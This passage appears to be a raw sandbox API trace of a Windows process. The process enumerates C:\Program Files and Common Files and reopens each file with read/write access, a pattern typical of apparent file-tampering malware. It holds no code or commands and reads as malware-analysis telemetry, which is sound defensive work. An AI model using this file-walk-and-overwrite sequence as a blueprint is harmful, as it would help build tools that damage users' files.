Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.845] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0073.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0073.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0073.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0073.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0073.845] FindNextFileW (in: hFindFile=0x78dd0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xe7a165b3, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xe7a165b3, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0073.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0073.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0073.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0073.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0073.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0073.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0073.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0073.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0073.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0073.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0073.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0073.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0073.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0073.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0073.845] FindFirstFileExW (in: lpFileName="C:\\Program Files\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78650 [0073.846] FindNextFileW (in: hFindFile=0x78650, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x40edfa76, ftLastAccessTime.dwHighDateTime=0x1d5d816, ftLastWriteTime.dwLowDateTime=0x40edfa76, ftLastWriteTime.dwHighDateTime=0x1d5d816, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0073.846] FindNextFileW (in: hFindFile=0x78650, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x3b4a1a5a, ftLastAccessTime.dwHighDateTime=0x1d5d816, ftLastWriteTime.dwLowDateTime=0x3b4a1a5a, ftLastWriteTime.dwHighDateTime=0x1d5d816, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Common Files", cAlternateFileName="COMMON~1")) returned 1 [0073.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0073.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0073.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0073.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0073.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0073.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0073.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0073.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0073.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0073.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0073.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0073.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45f68 [0073.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0073.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0073.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0073.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0073.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0073.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0073.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0073.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0073.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0073.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0073.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0073.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0073.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69210 [0073.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0073.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0073.847] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0073.847] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69210 | out: hHeap=0x20000) returned 1 [0073.847] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.847] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.847] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.847] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.847] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0073.847] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0073.847] AreFileApisANSI () returned 1 [0073.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files", lpUsedDefaultChar=0x0) returned 30 [0073.847] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0073.847] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.847] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.847] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0073.847] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0073.847] AreFileApisANSI () returned 1 [0073.847] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0073.847] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x538c8 [0073.847] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x538c8, cchWideChar=30 | out: lpWideCharStr="C:\\Program Files\\Common Files") returned 30 [0073.847] CreateFileW (lpFileName="C:\\Program Files\\Common Files" (normalized: "c:\\program files\\common files"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.847] GetLastError () returned 0x5 [0073.847] GetLastError () returned 0x5 [0073.847] SetLastError (dwErrCode=0x5) [0073.847] GetLastError () returned 0x5 [0073.847] SetLastError (dwErrCode=0x5) [0073.847] GetLastError () returned 0x5 [0073.847] SetLastError (dwErrCode=0x5) [0073.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0073.848] AreFileApisANSI () returned 1 [0073.848] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0073.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53838 [0073.848] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x53838, cchWideChar=30 | out: lpWideCharStr="C:\\Program Files\\Common Files") returned 30 [0073.848] CreateFileW (lpFileName="C:\\Program Files\\Common Files" (normalized: "c:\\program files\\common files"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.848] GetLastError () returned 0x5 [0073.848] GetLastError () returned 0x5 [0073.848] SetLastError (dwErrCode=0x5) [0073.848] GetLastError () returned 0x5 [0073.848] SetLastError (dwErrCode=0x5) [0073.848] GetLastError () returned 0x5 [0073.848] SetLastError (dwErrCode=0x5) [0073.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0073.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0073.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0073.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0073.848] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.848] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.848] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.848] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0073.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0073.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69350 [0073.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0073.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0073.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0073.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69350 | out: hHeap=0x20000) returned 1 [0073.849] FindNextFileW (in: hFindFile=0x78650, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1a307d95, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5d0779b, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5d0779b, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0073.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0073.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0073.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0073.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0073.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0073.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0073.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0073.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0073.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0073.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0073.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0073.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0073.849] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78290 [0073.849] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x3b4a1a5a, ftLastAccessTime.dwHighDateTime=0x1d5d816, ftLastWriteTime.dwLowDateTime=0x3b4a1a5a, ftLastWriteTime.dwHighDateTime=0x1d5d816, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0073.849] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89cca170, ftCreationTime.dwHighDateTime=0x1d575b4, ftLastAccessTime.dwLowDateTime=0x46f36b70, ftLastAccessTime.dwHighDateTime=0x1d5d80d, ftLastWriteTime.dwLowDateTime=0x46f36b70, ftLastWriteTime.dwHighDateTime=0x1d5d80d, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x0, dwReserved1=0x0, cFileName="centralcreditcard.exe", cAlternateFileName="CENTRA~1.EXE")) returned 1 [0073.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0073.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0073.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0073.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0073.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0073.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0073.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0073.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0073.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0073.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0073.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0073.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0073.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0073.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46208 [0073.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0073.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0073.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f5c8 [0073.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0073.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f5c8 | out: hHeap=0x20000) returned 1 [0073.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0073.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0073.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0073.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0073.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0073.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0073.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0073.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0073.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0073.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0073.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0073.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0073.850] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.850] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.850] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.850] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0073.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0073.850] AreFileApisANSI () returned 1 [0073.850] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\centralcreditcard.exe", lpUsedDefaultChar=0x0) returned 52 [0073.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0073.850] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.850] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0073.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0073.850] AreFileApisANSI () returned 1 [0073.851] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0073.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45fd8 [0073.851] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x45fd8, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Common Files\\centralcreditcard.exe") returned 52 [0073.851] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\centralcreditcard.exe" (normalized: "c:\\program files\\common files\\centralcreditcard.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0073.851] GetFileType (hFile=0x420) returned 0x1 [0073.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45fd8 | out: hHeap=0x20000) returned 1 [0073.851] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0073.851] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0073.852] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0073.852] CloseHandle (hObject=0x420) returned 1 [0073.852] AreFileApisANSI () returned 1 [0073.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0073.852] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46a58 [0073.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x46a58, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Common Files\\centralcreditcard.exe") returned 52 [0073.852] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\centralcreditcard.exe" (normalized: "c:\\program files\\common files\\centralcreditcard.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.852] GetLastError () returned 0x20 [0073.852] GetLastError () returned 0x20 [0073.852] SetLastError (dwErrCode=0x20) [0073.852] GetLastError () returned 0x20 [0073.852] SetLastError (dwErrCode=0x20) [0073.852] GetLastError () returned 0x20 [0073.852] SetLastError (dwErrCode=0x20) [0073.852] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46a58 | out: hHeap=0x20000) returned 1 [0073.852] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0073.852] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0073.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0073.853] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.853] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.853] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x4aab75fe, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0xa0417b85, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x4aadd873, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DESIGNER", cAlternateFileName="")) returned 1 [0073.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0073.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0073.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0073.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0073.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0073.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0073.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0073.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0073.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0073.853] RtlAllocateHeap (HeapHandle=0x20000, 